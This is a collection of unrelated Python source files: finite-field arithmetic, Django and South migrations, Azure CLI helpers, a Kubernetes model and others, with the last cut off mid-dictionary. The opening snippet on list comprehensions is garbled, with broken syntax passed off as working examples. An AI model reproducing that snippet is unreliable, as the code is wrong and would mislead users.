l1 = range(100)
l2 = 'abcd'
list(zip(l1, l2)) # [(0. 'a'), (1, 'b'), (2, 'c'), (3, 'd')]
# List Comprehension Alternative to map
l = [2, 3, 4]
def sq(x): --|
return x**2 |__
| list(map((lambda x: x++2. l))) # [4, 9, 16]
list(map(sq, l)) --|
result = []
for x in l:
result.append(x**2) # result -> [4, 9, 16]
[x**2 for x in l] # result -> [4, 9, 16]
[<expression> for <varname> in <iterable>]
l1 = [1, 2, 3]
l2 = [10, 20, 30, 40]
list(map(lambda x, y: x + y, l1, l2)) # [11, 22, 33]
# Remember: zip(l1, l2) # [(1, 10), (2, 20), (3, 30)]
[x + y for x, y in zip(l1, l2)] # [11, 22, 33]
l = [1, 2, 3, 4]
list(filter(lambda n: n % 2 == 0, l)) # [2, 4]
[x for x in l if x % 2 == 0] # [2, 4]
[<expresion> for <varname> in <iterable]
|
py | b414c02e4130c165ddbc769345ead1ab9241d2f0 | from __future__ import absolute_import
from typing import ( # noqa: F401
cast,
List,
Sequence,
Tuple,
Union,
)
field_modulus = 21888242871839275222246405745257275088696311157297823662689037894645226208583
FQ2_MODULUS_COEFFS = [1, 0]
FQ12_MODULUS_COEFFS = [82, 0, 0, 0, 0, 0, -18, 0, 0, 0, 0, 0] # Implied + [1]
FQ2_MC_TUPLES = [(0, 1)]
FQ12_MC_TUPLES = [(i, c) for i, c in enumerate(FQ12_MODULUS_COEFFS) if c]
# Extended euclidean algorithm to find modular inverses for
# integers
def prime_field_inv(a: int, n: int) -> int:
if a == 0:
return 0
lm, hm = 1, 0
low, high = a % n, n
while low > 1:
r = high // low
nm, new = hm - lm * r, high - low * r
lm, low, hm, high = nm, new, lm, low
return lm % n
IntOrFQ = Union[int, "FQ"]
# A class for field elements in FQ. Wrap a number in this class,
# and it becomes a field element.
class FQ(object):
n = None # type: int
def __init__(self, val: IntOrFQ) -> None:
if isinstance(val, FQ):
self.n = val.n
else:
self.n = val % field_modulus
assert isinstance(self.n, int)
def __add__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
return FQ((self.n + on) % field_modulus)
def __mul__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
return FQ((self.n * on) % field_modulus)
def __rmul__(self, other: IntOrFQ) -> "FQ":
return self * other
def __radd__(self, other: IntOrFQ) -> "FQ":
return self + other
def __rsub__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
return FQ((on - self.n) % field_modulus)
def __sub__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
return FQ((self.n - on) % field_modulus)
def __mod__(self, other: Union[int, "FQ"]) -> "FQ":
return self.__mod__(other)
def __div__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
assert isinstance(on, int)
return FQ(self.n * prime_field_inv(on, field_modulus) % field_modulus)
def __truediv__(self, other: IntOrFQ) -> "FQ":
return self.__div__(other)
def __rdiv__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
assert isinstance(on, int), on
return FQ(prime_field_inv(self.n, field_modulus) * on % field_modulus)
def __rtruediv__(self, other: IntOrFQ) -> "FQ":
return self.__rdiv__(other)
def __pow__(self, other: int) -> "FQ":
if other == 0:
return FQ(1)
elif other == 1:
return FQ(self.n)
elif other % 2 == 0:
return (self * self) ** (other // 2)
else:
return ((self * self) ** int(other // 2)) * self
def __eq__(self, other: IntOrFQ) -> bool: # type:ignore # https://github.com/python/mypy/issues/2783 # noqa: E501
if isinstance(other, FQ):
return self.n == other.n
else:
return self.n == other
def __ne__(self, other: IntOrFQ) -> bool: # type:ignore # https://github.com/python/mypy/issues/2783 # noqa: E501
return not self == other
def __neg__(self) -> "FQ":
return FQ(-self.n)
def __repr__(self) -> str:
return repr(self.n)
def __int__(self) -> int:
return self.n
@classmethod
def one(cls) -> "FQ":
return cls(1)
@classmethod
def zero(cls) -> "FQ":
return cls(0)
# Utility methods for polynomial math
def deg(p: Sequence[IntOrFQ]) -> int:
d = len(p) - 1
while p[d] == 0 and d:
d -= 1
return d
def poly_rounded_div(a: Sequence[IntOrFQ],
b: Sequence[IntOrFQ]) -> Sequence[IntOrFQ]:
dega = deg(a)
degb = deg(b)
temp = [x for x in a]
o = [0 for x in a]
for i in range(dega - degb, -1, -1):
o[i] = int(o[i] + temp[degb + i] * prime_field_inv(int(b[degb]), field_modulus))
for c in range(degb + 1):
temp[c + i] = (temp[c + i] - o[c])
return [x % field_modulus for x in o[:deg(o) + 1]]
# A class for elements in polynomial extension fields
class FQP(object):
degree = 0 # type: int
mc_tuples = None # type: List[Tuple[int, int]]
def __init__(self,
coeffs: Sequence[IntOrFQ],
modulus_coeffs: Sequence[IntOrFQ]=None) -> None:
assert len(coeffs) == len(modulus_coeffs)
self.coeffs = coeffs
# The coefficients of the modulus, without the leading [1]
self.modulus_coeffs = modulus_coeffs
# The degree of the extension field
self.degree = len(self.modulus_coeffs)
def __add__(self, other: "FQP") -> "FQP":
assert isinstance(other, type(self))
return type(self)([
int(x + y) % field_modulus
for x, y
in zip(self.coeffs, other.coeffs)
])
def __sub__(self, other: "FQP") -> "FQP":
assert isinstance(other, type(self))
return type(self)([
int(x - y) % field_modulus
for x, y
in zip(self.coeffs, other.coeffs)
])
def __mod__(self, other: Union[int, "FQP"]) -> "FQP":
return self.__mod__(other)
def __mul__(self, other: Union[int, "FQP"]) -> "FQP":
if isinstance(other, int):
return type(self)([int(c) * other % field_modulus for c in self.coeffs])
else:
# assert isinstance(other, self.__class__)
b = [0] * (self.degree * 2 - 1)
inner_enumerate = list(enumerate(other.coeffs))
for i, eli in enumerate(self.coeffs):
for j, elj in inner_enumerate:
b[i + j] += int(eli * elj)
# MID = len(self.coeffs) // 2
for exp in range(self.degree - 2, -1, -1):
top = b.pop()
for i, c in self.mc_tuples:
b[exp + i] -= top * c
return type(self)([x % field_modulus for x in b])
def __rmul__(self, other: Union[int, "FQP"]) -> "FQP":
return self * other
def __div__(self, other: Union[int, "FQ", "FQP"]) -> "FQP":
if isinstance(other, int):
return type(self)([
int(c) * prime_field_inv(other, field_modulus) % field_modulus
for c
in self.coeffs
])
else:
assert isinstance(other, type(self))
return self * other.inv()
def __truediv__(self, other: Union[int, "FQ", "FQP"]) -> "FQP":
return self.__div__(other)
def __pow__(self, other: int) -> "FQP":
o = type(self)([1] + [0] * (self.degree - 1))
t = self
while other > 0:
if other & 1:
o = o * t
other >>= 1
t = t * t
return o
# Extended euclidean algorithm used to find the modular inverse
def inv(self) -> "FQP":
lm, hm = [1] + [0] * self.degree, [0] * (self.degree + 1)
low, high = (
# Ignore mypy yelling about the inner types for the lists being incompatible
cast(List[IntOrFQ], list(self.coeffs + [0])), # type: ignore
cast(List[IntOrFQ], list(self.modulus_coeffs + [1])), # type: ignore
)
low, high = list(self.coeffs + [0]), self.modulus_coeffs + [1] # type: ignore
while deg(low):
r = cast(List[IntOrFQ], poly_rounded_div(high, low))
r += [0] * (self.degree + 1 - len(r))
nm = [x for x in hm]
new = [x for x in high]
# assert len(lm) == len(hm) == len(low) == len(high) == len(nm) == len(new) == self.degree + 1 # noqa: E501
for i in range(self.degree + 1):
for j in range(self.degree + 1 - i):
nm[i + j] -= lm[i] * int(r[j])
new[i + j] -= low[i] * r[j]
nm = [x % field_modulus for x in nm]
new = [int(x) % field_modulus for x in new]
lm, low, hm, high = nm, new, lm, low
return type(self)(lm[:self.degree]) / low[0]
def __repr__(self) -> str:
return repr(self.coeffs)
def __eq__(self, other: "FQP") -> bool: # type: ignore # https://github.com/python/mypy/issues/2783 # noqa: E501
assert isinstance(other, type(self))
for c1, c2 in zip(self.coeffs, other.coeffs):
if c1 != c2:
return False
return True
def __ne__(self, other: "FQP") -> bool: # type: ignore # https://github.com/python/mypy/issues/2783 # noqa: E501
return not self == other
def __neg__(self) -> "FQP":
return type(self)([-c for c in self.coeffs])
@classmethod
def one(cls) -> "FQP":
return cls([1] + [0] * (cls.degree - 1))
@classmethod
def zero(cls) -> "FQP":
return cls([0] * cls.degree)
# The quadratic extension field
class FQ2(FQP):
degree = 2
mc_tuples = FQ2_MC_TUPLES
def __init__(self, coeffs: Sequence[IntOrFQ]) -> None:
super().__init__(coeffs, FQ2_MODULUS_COEFFS)
assert self.degree == 2
assert self.mc_tuples == FQ2_MC_TUPLES
# The 12th-degree extension field
class FQ12(FQP):
degree = 12
mc_tuples = FQ12_MC_TUPLES
def __init__(self, coeffs: Sequence[IntOrFQ]) -> None:
super().__init__(coeffs, FQ12_MODULUS_COEFFS)
assert self.degree == 12
assert self.mc_tuples == FQ12_MC_TUPLES
|
py | b414c08f52e48a6ef52226bc69040809a7fe7582 | # Generated by Django 2.1.11 on 2019-08-08 18:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
py | b414c0c01ffa27aa92ff8b48eb6056a594e86d92 | import numpy as np
from .freq_filter import freq_filt, gaussian
def bandpass(orig_img: np.ndarray) -> np.ndarray:
"""Bandpass filters image and returns result.
Parameters
----------
orig_img : np.ndarray
original image to bandpass filter
Returns
-------
np.ndarray
bandpass filtered image
"""
# cutoff frequencies generation (from 1 to 25)
low_cutoff_freq = np.random.uniform(1, 12.5)
high_cutoff_freq = np.random.uniform(low_cutoff_freq + 5, 25)
# create gaussian transfer function
M, N = orig_img.shape[:2]
transfer_func = gaussian((M * 2, N * 2), high_cutoff_freq) - gaussian(
(M * 2, N * 2), low_cutoff_freq
)
# frequency filter and return image
return freq_filt(orig_img, transfer_func)
|
py | b414c165483c280765c702884f93149289a4c51c | from django import template
from django.template import Library
import six
from django.utils.safestring import mark_safe
from django.utils.html import escape
from xadmin.util import static, vendor as util_vendor
register = Library()
@register.simple_tag(takes_context=True)
def view_block(context, block_name, *args, **kwargs):
if 'admin_view' not in context:
return ""
admin_view = context['admin_view']
nodes = []
method_name = 'block_%s' % block_name
cls_str = str if six.PY3 else basestring
for view in [admin_view] + admin_view.plugins:
if hasattr(view, method_name) and callable(getattr(view, method_name)):
block_func = getattr(view, method_name)
result = block_func(context, nodes, *args, **kwargs)
if result and isinstance(result, cls_str):
nodes.append(result)
if nodes:
return mark_safe(''.join(nodes))
else:
return ""
@register.filter
def admin_urlname(value, arg):
return 'xadmin:%s_%s_%s' % (value.app_label, value.model_name, arg)
static = register.simple_tag(static)
@register.simple_tag(takes_context=True)
def vendor(context, *tags):
return util_vendor(*tags).render()
class BlockcaptureNode(template.Node):
"""https://chriskief.com/2013/11/06/conditional-output-of-a-django-block/"""
def __init__(self, nodelist, varname):
self.nodelist = nodelist
self.varname = varname
def render(self, context):
output = self.nodelist.render(context)
context[self.varname] = escape(output)
return ''
@register.tag(name='blockcapture')
def do_blockcapture(parser, token):
try:
tag_name, args = token.contents.split(None, 1)
except ValueError:
raise template.TemplateSyntaxError("'blockcapture' node requires a variable name.")
nodelist = parser.parse(('endblockcapture',))
parser.delete_first_token()
return BlockcaptureNode(nodelist, args)
|
py | b414c58d62029313e8553063874f449ba0230893 | from functools import singledispatch
from pathlib import Path
from typed_ast import ast3
from paradigm.hints import Namespace
from . import (construction,
conversion)
@singledispatch
def execute(node: ast3.AST,
*,
source_path: Path,
namespace: Namespace) -> None:
raise TypeError('Unsupported node type: {type}.'
.format(type=type(node)))
@execute.register(ast3.stmt)
def execute_statement(node: ast3.stmt,
*,
source_path: Path,
namespace: Namespace) -> None:
execute_tree(construction.from_node(node),
source_path=source_path,
namespace=namespace)
@execute.register(ast3.Module)
def execute_tree(node: ast3.Module,
*,
source_path: Path,
namespace: Namespace) -> None:
code = compile(conversion.typed_to_plain(node), str(source_path), 'exec')
exec(code, namespace)
|
py | b414c60c87964322803cc6b50e7488b0ecde7e31 |
import argparse
import subprocess
from os.path import abspath, dirname
BASE_DIR = abspath(dirname(dirname(abspath(__file__))))
def main(args):
assert args.black is not None or args.pylint or args.mypy or args.coverage, \
f'need to specify --black|--pylint|--mypy|--coverage'
commands_list = [f'cd {BASE_DIR}/dev']
if args.black is not None:
if args.black == 'check':
command = f'black --check {BASE_DIR}/nerblackbox'
elif args.black == 'diff':
command = f'black --diff --color {BASE_DIR}/nerblackbox'
elif args.black == 'convert':
command = f'black {BASE_DIR}/nerblackbox'
else:
raise Exception(f'need to specify --black check|diff|convert')
commands_list.append(command)
if args.pylint:
command = f'pylint {BASE_DIR}/nerblackbox'
commands_list.append(command)
if args.mypy:
# --disallow-untyped-calls --disallow-untyped-defs --disallow-incomplete-defs
command = f'mypy --config-file=pyproject.toml {BASE_DIR}/nerblackbox'
commands_list.append(command)
if args.coverage:
command = f'coverage run --source=nerblackbox ' \
f'-m pytest {BASE_DIR}/nerblackbox; ' \
f'coverage html; ' \
f'coverage report'
commands_list.append(command)
commands = ';'.join(commands_list)
print(f'### {commands}')
subprocess.run(commands, shell=True)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--black', type=str, help='check, diff or convert')
parser.add_argument('--pylint', action='store_true', default=False)
parser.add_argument('--mypy', action='store_true', default=False)
parser.add_argument('--coverage', action='store_true', default=False)
_args = parser.parse_args()
main(_args)
|
py | b414ca0d7fcfc342adeddd96f77263878075c48e | from django.conf import settings
PAGSEGURO_EMAIL = getattr(settings, "PAGSEGURO_EMAIL", "")
PAGSEGURO_TOKEN = getattr(settings, "PAGSEGURO_TOKEN", "")
PAGSEGURO_SANDBOX = getattr(settings, "PAGSEGURO_SANDBOX", True)
PAGSEGURO_LOG_IN_MODEL = getattr(settings, "PAGSEGURO_LOG_IN_MODEL", True)
if PAGSEGURO_SANDBOX:
CHECKOUT_URL = "https://ws.sandbox.pagseguro.uol.com.br/v2/checkout"
PAYMENT_URL = "https://sandbox.pagseguro.uol.com.br/v2/checkout/payment.html"
NOTIFICATION_URL = "https://ws.sandbox.pagseguro.uol.com.br/v2/transactions/notifications"
TRANSACTION_URL = "https://ws.sandbox.pagseguro.uol.com.br/v2/transactions"
SESSION_URL = "https://ws.sandbox.pagseguro.uol.com.br/v2/sessions/"
else:
CHECKOUT_URL = "https://ws.pagseguro.uol.com.br/v2/checkout"
PAYMENT_URL = "https://pagseguro.uol.com.br/v2/checkout/payment.html"
NOTIFICATION_URL = "https://ws.pagseguro.uol.com.br/v2/transactions/notifications"
TRANSACTION_URL = "https://ws.pagseguro.uol.com.br/v2/transactions"
SESSION_URL = "https://ws.pagseguro.uol.com.br/v2/sessions/"
TRANSACTION_STATUS = {
"1": "aguardando",
"2": "em_analise",
"3": "pago",
"4": "disponivel",
"5": "em_disputa",
"6": "devolvido",
"7": "cancelado",
"8": "debitado",
"9": "retencao_temporaria",
}
|
py | b414ca50df1abce10ed52d3b8703687e6f26fa10 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import batch_write_spans
PROJECT_ID = os.environ["GOOGLE_CLOUD_PROJECT"]
def test_get_trace():
batch_write_spans.batch_write_spans(project_id=PROJECT_ID)
|
py | b414cb073d695f67b11538dc24904eda24f7606e | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.azclierror import (
CLIInternalError
)
def should_load_source(source):
'''Check whether to load `az {source} connection`
If {source} is an extension (e.g, spring-cloud), load the command group only when {source} is installed
:param source: the source resource type
'''
from azure.cli.core.extension.operations import list_extensions
from ._resource_config import SOURCE_RESOURCES_IN_EXTENSION
# names of CLI installed extensions
installed_extensions = [item.get('name') for item in list_extensions()]
# if source resource is released as an extension, load our command groups
# only when the extension is installed
if source not in SOURCE_RESOURCES_IN_EXTENSION or source.value in installed_extensions:
return True
return False
def generate_random_string(length=5, prefix='', lower_only=False, ensure_complexity=False):
'''Generate a random string
:param length: the length of generated random string, not including the prefix
:param prefix: the prefix string
:param lower_only: ensure the generated string only includes lower case characters
:param ensure_complexity: ensure the generated string satisfy complexity requirements
'''
import random
import string
if lower_only and ensure_complexity:
raise CLIInternalError('lower_only and ensure_complexity can not both be specified to True')
if ensure_complexity and length < 8:
raise CLIInternalError('ensure_complexity needs length >= 8')
character_set = string.ascii_letters + string.digits
if lower_only:
character_set = string.ascii_lowercase
while True:
randstr = '{}{}'.format(prefix, ''.join(random.sample(character_set, length)))
lowers = [c for c in randstr if c.islower()]
uppers = [c for c in randstr if c.isupper()]
numbers = [c for c in randstr if c.isnumeric()]
if not ensure_complexity or (lowers and uppers and numbers):
break
return randstr
def run_cli_cmd(cmd, retry=0):
'''Run a CLI command
:param cmd: The CLI command to be executed
:param retry: The times to re-try
'''
import json
import subprocess
output = subprocess.run(cmd, shell=True, check=False, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if output.returncode != 0:
if retry:
run_cli_cmd(cmd, retry - 1)
else:
raise CLIInternalError('Command execution failed, command is: '
'{}, error message is: {}'.format(cmd, output.stderr))
return json.loads(output.stdout) if output.stdout else None
def set_user_token_header(client, cli_ctx):
'''Set user token header to work around OBO'''
from azure.cli.core._profile import Profile
# pylint: disable=protected-access
# HACK: set custom header to work around OBO
profile = Profile(cli_ctx=cli_ctx)
creds, _, _ = profile.get_raw_token()
client._client._config.headers_policy._headers['x-ms-serviceconnector-user-token'] = creds[1]
# HACK: hide token header
client._config.logging_policy.headers_to_redact.append('x-ms-serviceconnector-user-token')
return client
|
py | b414cb74ca3a56a0f7a17a757d0ee3dd487ed075 | # Generated by Django 3.1.3 on 2020-12-12 16:29
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('activities', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Interest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=100)),
('completed', models.BooleanField(blank=True, default=False, null=True)),
('description', models.TextField()),
('activities', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='activities.activity')),
],
),
]
|
py | b414cc548864f6f05694f43ecf7d9c5ee66805ff | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1StatefulSetStatus(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'collision_count': 'int',
'conditions': 'list[V1StatefulSetCondition]',
'current_replicas': 'int',
'current_revision': 'str',
'observed_generation': 'int',
'ready_replicas': 'int',
'replicas': 'int',
'update_revision': 'str',
'updated_replicas': 'int'
}
attribute_map = {
'collision_count': 'collisionCount',
'conditions': 'conditions',
'current_replicas': 'currentReplicas',
'current_revision': 'currentRevision',
'observed_generation': 'observedGeneration',
'ready_replicas': 'readyReplicas',
'replicas': 'replicas',
'update_revision': 'updateRevision',
'updated_replicas': 'updatedReplicas'
}
def __init__(self, collision_count=None, conditions=None, current_replicas=None, current_revision=None, observed_generation=None, ready_replicas=None, replicas=None, update_revision=None, updated_replicas=None):
"""
V1StatefulSetStatus - a model defined in Swagger
"""
self._collision_count = None
self._conditions = None
self._current_replicas = None
self._current_revision = None
self._observed_generation = None
self._ready_replicas = None
self._replicas = None
self._update_revision = None
self._updated_replicas = None
self.discriminator = None
if collision_count is not None:
self.collision_count = collision_count
if conditions is not None:
self.conditions = conditions
if current_replicas is not None:
self.current_replicas = current_replicas
if current_revision is not None:
self.current_revision = current_revision
if observed_generation is not None:
self.observed_generation = observed_generation
if ready_replicas is not None:
self.ready_replicas = ready_replicas
self.replicas = replicas
if update_revision is not None:
self.update_revision = update_revision
if updated_replicas is not None:
self.updated_replicas = updated_replicas
@property
def collision_count(self):
"""
Gets the collision_count of this V1StatefulSetStatus.
collisionCount is the count of hash collisions for the StatefulSet. The StatefulSet controller uses this field as a collision avoidance mechanism when it needs to create the name for the newest ControllerRevision.
:return: The collision_count of this V1StatefulSetStatus.
:rtype: int
"""
return self._collision_count
@collision_count.setter
def collision_count(self, collision_count):
"""
Sets the collision_count of this V1StatefulSetStatus.
collisionCount is the count of hash collisions for the StatefulSet. The StatefulSet controller uses this field as a collision avoidance mechanism when it needs to create the name for the newest ControllerRevision.
:param collision_count: The collision_count of this V1StatefulSetStatus.
:type: int
"""
self._collision_count = collision_count
@property
def conditions(self):
"""
Gets the conditions of this V1StatefulSetStatus.
Represents the latest available observations of a statefulset's current state.
:return: The conditions of this V1StatefulSetStatus.
:rtype: list[V1StatefulSetCondition]
"""
return self._conditions
@conditions.setter
def conditions(self, conditions):
"""
Sets the conditions of this V1StatefulSetStatus.
Represents the latest available observations of a statefulset's current state.
:param conditions: The conditions of this V1StatefulSetStatus.
:type: list[V1StatefulSetCondition]
"""
self._conditions = conditions
@property
def current_replicas(self):
"""
Gets the current_replicas of this V1StatefulSetStatus.
currentReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by currentRevision.
:return: The current_replicas of this V1StatefulSetStatus.
:rtype: int
"""
return self._current_replicas
@current_replicas.setter
def current_replicas(self, current_replicas):
"""
Sets the current_replicas of this V1StatefulSetStatus.
currentReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by currentRevision.
:param current_replicas: The current_replicas of this V1StatefulSetStatus.
:type: int
"""
self._current_replicas = current_replicas
@property
def current_revision(self):
"""
Gets the current_revision of this V1StatefulSetStatus.
currentRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [0,currentReplicas).
:return: The current_revision of this V1StatefulSetStatus.
:rtype: str
"""
return self._current_revision
@current_revision.setter
def current_revision(self, current_revision):
"""
Sets the current_revision of this V1StatefulSetStatus.
currentRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [0,currentReplicas).
:param current_revision: The current_revision of this V1StatefulSetStatus.
:type: str
"""
self._current_revision = current_revision
@property
def observed_generation(self):
"""
Gets the observed_generation of this V1StatefulSetStatus.
observedGeneration is the most recent generation observed for this StatefulSet. It corresponds to the StatefulSet's generation, which is updated on mutation by the API Server.
:return: The observed_generation of this V1StatefulSetStatus.
:rtype: int
"""
return self._observed_generation
@observed_generation.setter
def observed_generation(self, observed_generation):
"""
Sets the observed_generation of this V1StatefulSetStatus.
observedGeneration is the most recent generation observed for this StatefulSet. It corresponds to the StatefulSet's generation, which is updated on mutation by the API Server.
:param observed_generation: The observed_generation of this V1StatefulSetStatus.
:type: int
"""
self._observed_generation = observed_generation
@property
def ready_replicas(self):
"""
Gets the ready_replicas of this V1StatefulSetStatus.
readyReplicas is the number of Pods created by the StatefulSet controller that have a Ready Condition.
:return: The ready_replicas of this V1StatefulSetStatus.
:rtype: int
"""
return self._ready_replicas
@ready_replicas.setter
def ready_replicas(self, ready_replicas):
"""
Sets the ready_replicas of this V1StatefulSetStatus.
readyReplicas is the number of Pods created by the StatefulSet controller that have a Ready Condition.
:param ready_replicas: The ready_replicas of this V1StatefulSetStatus.
:type: int
"""
self._ready_replicas = ready_replicas
@property
def replicas(self):
"""
Gets the replicas of this V1StatefulSetStatus.
replicas is the number of Pods created by the StatefulSet controller.
:return: The replicas of this V1StatefulSetStatus.
:rtype: int
"""
return self._replicas
@replicas.setter
def replicas(self, replicas):
"""
Sets the replicas of this V1StatefulSetStatus.
replicas is the number of Pods created by the StatefulSet controller.
:param replicas: The replicas of this V1StatefulSetStatus.
:type: int
"""
if replicas is None:
raise ValueError("Invalid value for `replicas`, must not be `None`")
self._replicas = replicas
@property
def update_revision(self):
"""
Gets the update_revision of this V1StatefulSetStatus.
updateRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [replicas-updatedReplicas,replicas)
:return: The update_revision of this V1StatefulSetStatus.
:rtype: str
"""
return self._update_revision
@update_revision.setter
def update_revision(self, update_revision):
"""
Sets the update_revision of this V1StatefulSetStatus.
updateRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [replicas-updatedReplicas,replicas)
:param update_revision: The update_revision of this V1StatefulSetStatus.
:type: str
"""
self._update_revision = update_revision
@property
def updated_replicas(self):
"""
Gets the updated_replicas of this V1StatefulSetStatus.
updatedReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by updateRevision.
:return: The updated_replicas of this V1StatefulSetStatus.
:rtype: int
"""
return self._updated_replicas
@updated_replicas.setter
def updated_replicas(self, updated_replicas):
"""
Sets the updated_replicas of this V1StatefulSetStatus.
updatedReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by updateRevision.
:param updated_replicas: The updated_replicas of this V1StatefulSetStatus.
:type: int
"""
self._updated_replicas = updated_replicas
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1StatefulSetStatus):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
py | b414cc7dbcff1f4455b3eac4fcac1af5c2893cdd | # -*- coding: utf-8 -*-
# Copyright: (c) 2019, Jordan Borean (@jborean93) <[email protected]>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
def to_bytes(value, encoding='utf-8'):
"""
Makes sure the value is encoded as a byte string.
:param value: The Python string value to encode.
:param encoding: The encoding to use.
:return: The byte string that was encoded.
"""
if isinstance(value, bytes):
return value
return value.encode(encoding)
def to_text(value, encoding='utf-8'):
"""
Makes sure the value is decoded as a text string.
:param value: The Python byte string value to decode.
:param encoding: The encoding to use.
:return: The text/unicode string that was decoded.
"""
if isinstance(value, str):
return value
return value.decode(encoding)
|
py | b414cd2fdc6c0242ef1ed35ecc6af72f908f6aae | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
try:
from django.contrib.auth import get_user_model
except ImportError: # django < 1.5
from django.contrib.auth.models import User
else:
User = get_user_model()
user_orm_label = '%s.%s' % (User._meta.app_label, User._meta.object_name)
user_model_label = '%s.%s' % (User._meta.app_label, User._meta.model_name)
user_ptr_name = '%s_ptr' % User._meta.object_name.lower()
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
try:
ct = orm['contenttypes.ContentType'].objects.get(model='page', app_label='cms')
except orm['contenttypes.ContentType'].DoesNotExist:
ct = orm['contenttypes.ContentType'].objects.create(name='page', model='page', app_label='cms')
try:
perm = orm['auth.permission'].objects.get(codename='publish_page')
except orm['auth.permission'].DoesNotExist:
perm = orm['auth.permission'].objects.create(content_type=ct, codename='publish_page', name=u'Can publish Page')
def backwards(self, orm):
"Write your backwards methods here."
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
user_model_label: {
'Meta': {'object_name': User.__name__, 'db_table': "'%s'" % User._meta.db_table},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
